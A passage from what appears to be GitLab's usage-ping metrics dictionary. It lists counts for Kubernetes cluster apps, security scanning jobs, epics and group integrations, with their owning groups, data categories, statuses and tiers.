definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175259_clusters_applications_cert_managers.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.clusters_applications_cilium` + +Total GitLab Managed clusters with GitLab Managed App:Cilium installed + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175312_clusters_applications_cilium.yml) + +Group: `group::configure` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.clusters_applications_crossplane` + +Total GitLab Managed clusters with GitLab Managed App:Crossplane installed + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175301_clusters_applications_crossplane.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.clusters_applications_elastic_stack` + +Total GitLab Managed clusters with GitLab Managed App:Elastic Stack installed + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175309_clusters_applications_elastic_stack.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.clusters_applications_helm` + +Total GitLab Managed clusters with GitLab Managed App:Helm enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175255_clusters_applications_helm.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.clusters_applications_ingress` + +Total GitLab Managed clusters with GitLab Managed App:Ingress installed + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175257_clusters_applications_ingress.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.clusters_applications_jupyter` + +Total GitLab Managed clusters with GitLab Managed App:Jupyter installed + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175310_clusters_applications_jupyter.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.clusters_applications_knative` + +Total GitLab Managed clusters with GitLab Managed App:Knative installed + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175307_clusters_applications_knative.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.clusters_applications_prometheus` + +Total GitLab Managed clusters with GitLab Managed App:Prometheus installed + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175303_clusters_applications_prometheus.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.clusters_applications_runner` + +Total GitLab Managed clusters with GitLab Managed App:Runner installed + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175305_clusters_applications_runner.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.clusters_disabled` + +Number of Kubernetes clusters attached to GitLab currently disabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175242_clusters_disabled.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.clusters_enabled` + +Number of Kubernetes clusters attached to GitLab currently enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175234_clusters_enabled.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.clusters_management_project` + +Total GitLab Managed clusters with defined cluster management project + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175314_clusters_management_project.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.clusters_platforms_eks` + +Total GitLab Managed clusters provisioned with GitLab on AWS EKS + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175250_clusters_platforms_eks.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.clusters_platforms_gke` + +Total GitLab Managed clusters provisioned with GitLab on GCE GKE + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175251_clusters_platforms_gke.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.clusters_platforms_user` + +Total GitLab Managed clusters that are user provisioned + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175253_clusters_platforms_user.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.commit_comment` + +Count of total unique commit comments. Does not include MR diff comments + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182004_commit_comment.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.confidential_epics` + +Count of confidential epics + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216181205_confidential_epics.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `counts.container_scanning_jobs` + +Count of Container Scanning jobs run + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216175458_container_scanning_jobs.yml) + +Group: `group::container security` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `ultimate` + +### `counts.coverage_fuzzing_jobs` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216183146_coverage_fuzzing_jobs.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `counts.cycle_analytics_views` + +Total visits to VSA (both group- and project-level) all time + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216174832_cycle_analytics_views.yml) + +Group: `group::optimize` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.dast_jobs` + +Count of DAST jobs run + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175612_dast_jobs.yml) + +Group: `group::dynamic analysis` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free` + +### `counts.dast_on_demand_pipelines` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216183149_dast_on_demand_pipelines.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `counts.dependency_list_usages_total` + +Count to Dependency List page views + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216175211_dependency_list_usages_total.yml) + +Group: `group::composition analysis` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `ultimate` + +### `counts.dependency_scanning_jobs` + +Count of Dependency Scanning jobs run + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216175213_dependency_scanning_jobs.yml) + +Group: `group::composition analysis` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `ultimate` + +### `counts.deploy_keys` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181908_deploy_keys.yml) + +Group: `group::release` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `counts.deployments` + +Total deployments count + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210201124934_deployments.yml) + +Group: `group::ops release` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.design_management_designs_create` + +Number of designs that were created + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180740_design_management_designs_create.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.design_management_designs_delete` + +Number of designs that were deleted + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180743_design_management_designs_delete.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.design_management_designs_update` + +Number of updates to designs + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180741_design_management_designs_update.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.environments` + +Total available and stopped environments + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181914_environments.yml) + +Group: `group::release` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `counts.epic_issues` + +Count of issues that are assigned to an epic + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216181208_epic_issues.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `counts.epics` + +Count of all epics + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216181206_epics.yml) + +Group: `group::product planning` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `counts.epics_deepest_relationship_level` + +Count of the deepest relationship level for epics + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216181212_epics_deepest_relationship_level.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `ultimate` + +### `counts.failed_deployments` + +Total failed deployments + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181912_failed_deployments.yml) + +Group: `group::release` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `counts.feature_flags` + +Number of feature flag toggles + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181249_feature_flags.yml) + +Group: `group::progressive delivery` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `counts.geo_event_log_max_id` + +Number of replication events on a Geo primary + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216180405_geo_event_log_max_id.yml) + +Group: `group::geo` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `counts.geo_nodes` + +Total number of sites in a Geo deployment + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210201124936_geo_nodes.yml) + +Group: `group::geo` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `counts.grafana_integrated_projects` + +Total Grafana integrations attached to projects + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180927_grafana_integrated_projects.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `counts.group_clusters_disabled` + +Total GitLab Managed disabled clusters previously attached to groups + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175246_group_clusters_disabled.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.group_clusters_enabled` + +Total GitLab Managed clusters attached to groups + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175238_group_clusters_enabled.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups` + +Total count of groups as of usage ping snapshot + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180750_groups.yml) + +Group: `group::access` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_asana_active` + +Count of groups with active integrations for Asana + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175625_groups_asana_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_assembla_active` + +Count of groups with active integrations for Assembla + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175636_groups_assembla_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_bamboo_active` + +Count of groups with active integrations for Bamboo CI + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175647_groups_bamboo_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_bugzilla_active` + +Count of groups with active integrations for Bugzilla + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175659_groups_bugzilla_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_buildkite_active` + +Count of groups with active integrations for Buildkite + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175710_groups_buildkite_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_campfire_active` + +Count of groups with active integrations for Campfire + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175721_groups_campfire_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_confluence_active` + +Count of groups with active integrations for Confluence + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175733_groups_confluence_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_custom_issue_tracker_active` + +Count of groups with active integrations for a Custom Issue Tracker + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175744_groups_custom_issue_tracker_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_datadog_active` + +Count of groups with active integrations for Datadog + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182549_groups_datadog_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_discord_active` + +Count of groups with active integrations for Discord + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175755_groups_discord_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_drone_ci_active` + +Count of groups with active integrations for Drone CI + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175806_groups_drone_ci_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_emails_on_push_active` + +Count of groups with active integrations for Emails on Push + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175817_groups_emails_on_push_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_ewm_active` + +Count of groups with active integrations for EWM + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182616_groups_ewm_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_external_wiki_active` + +Count of groups with active integrations for External Wiki + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175828_groups_external_wiki_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_flowdock_active` + +Count of groups with active integrations for Flowdock + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175839_groups_flowdock_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_github_active` + +Count of groups with active integrations for GitHub + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216175850_groups_github_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `counts.groups_hangouts_chat_active` + +Count of groups with active integrations for Hangouts Chat + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175901_groups_hangouts_chat_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_hipchat_active` + +Count of groups with active integrations for HipChat + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175912_groups_hipchat_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `removed` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_inheriting_asana_active` + +Count of active groups inheriting integrations for Asana + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175632_groups_inheriting_asana_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_inheriting_assembla_active` + +Count of active groups inheriting integrations for Assembla + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175644_groups_inheriting_assembla_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_inheriting_bamboo_active` + +Count of active groups inheriting integrations for Bamboo CI + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175655_groups_inheriting_bamboo_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_inheriting_bugzilla_active` + +Count of active groups inheriting integrations for Bugzilla + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175706_groups_inheriting_bugzilla_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_inheriting_buildkite_active` + +Count of active groups inheriting integrations for Buildkite + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175717_groups_inheriting_buildkite_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_inheriting_campfire_active` + +Count of active groups inheriting integrations for Campfire + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175729_groups_inheriting_campfire_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_inheriting_confluence_active` + +Count of active groups inheriting integrations for Confluence + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175740_groups_inheriting_confluence_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_inheriting_custom_issue_tracker_active` + +Count of active groups inheriting integrations for a Custom Issue Tracker + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175751_groups_inheriting_custom_issue_tracker_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_inheriting_datadog_active` + +Count of active groups inheriting integrations for Datadog + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182557_groups_inheriting_datadog_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_inheriting_discord_active` + +Count of active groups inheriting integrations for Discord + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175802_groups_inheriting_discord_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_inheriting_drone_ci_active` + +Count of active groups inheriting integrations for Drone CI + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175813_groups_inheriting_drone_ci_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_inheriting_emails_on_push_active` + +Count of active groups inheriting integrations for Emails on Push + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175824_groups_inheriting_emails_on_push_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_inheriting_ewm_active` + +Count of active groups inheriting integrations for EWM + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182623_groups_inheriting_ewm_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_inheriting_external_wiki_active` + +Count of active groups inheriting integrations for External Wiki + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175835_groups_inheriting_external_wiki_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_inheriting_flowdock_active` + +Count of active groups inheriting integrations for Flowdock + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175846_groups_inheriting_flowdock_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_inheriting_github_active` + +Count of active groups inheriting integrations for GitHub + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216175857_groups_inheriting_github_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `counts.groups_inheriting_hangouts_chat_active` + +Count of active groups inheriting integrations for Hangouts Chat + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175908_groups_inheriting_hangouts_chat_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_inheriting_hipchat_active` + +Count of active groups inheriting integrations for HipChat + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175919_groups_inheriting_hipchat_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `removed` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_inheriting_irker_active` + +Count of active groups inheriting integrations for Irker + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175930_groups_inheriting_irker_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_inheriting_jenkins_active` + +Count of active groups inheriting integrations for Jenkins + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175941_groups_inheriting_jenkins_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_inheriting_jira_active` + +Count of active groups inheriting integrations for Jira + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175952_groups_inheriting_jira_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_inheriting_mattermost_active` + +Count of active groups inheriting integrations for Mattermost + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180003_groups_inheriting_mattermost_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_inheriting_mattermost_slash_commands_active` + +Count of active groups inheriting integrations for Mattermost (slash commands) + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180014_groups_inheriting_mattermost_slash_commands_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_inheriting_microsoft_teams_active` + +Count of active groups inheriting integrations for Microsoft Teams + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180025_groups_inheriting_microsoft_teams_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_inheriting_mock_ci_active` + +Count of active groups inheriting integrations for Mock CI + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182732_groups_inheriting_mock_ci_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `removed` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_inheriting_mock_monitoring_active` + +Count of active groups inheriting integrations for Mock Monitoring + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182743_groups_inheriting_mock_monitoring_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `removed` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_inheriting_packagist_active` + +Count of active groups inheriting integrations for Packagist + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180036_groups_inheriting_packagist_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_inheriting_pipelines_email_active` + +Count of active groups inheriting integrations for Pipeline Emails + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180047_groups_inheriting_pipelines_email_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_inheriting_pivotaltracker_active` + +Count of active groups inheriting integrations for Pivotal Tracker + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180058_groups_inheriting_pivotaltracker_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_inheriting_prometheus_active` + +Count of active groups inheriting integrations for Prometheus + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180940_groups_inheriting_prometheus_active.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_inheriting_pushover_active` + +Count of active groups inheriting integrations for Pushover + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180109_groups_inheriting_pushover_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_inheriting_redmine_active` + +Count of active groups inheriting integrations for Redmine + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180120_groups_inheriting_redmine_active.yml) + +Group: `group::ecosystem` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `counts.groups_inheriting_slack_active` + +Count of active groups inheriting integrations for Slack + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180131_groups_inheriting_slack_active.yml) + +Group: `group::ecosystem` + +Data Category: 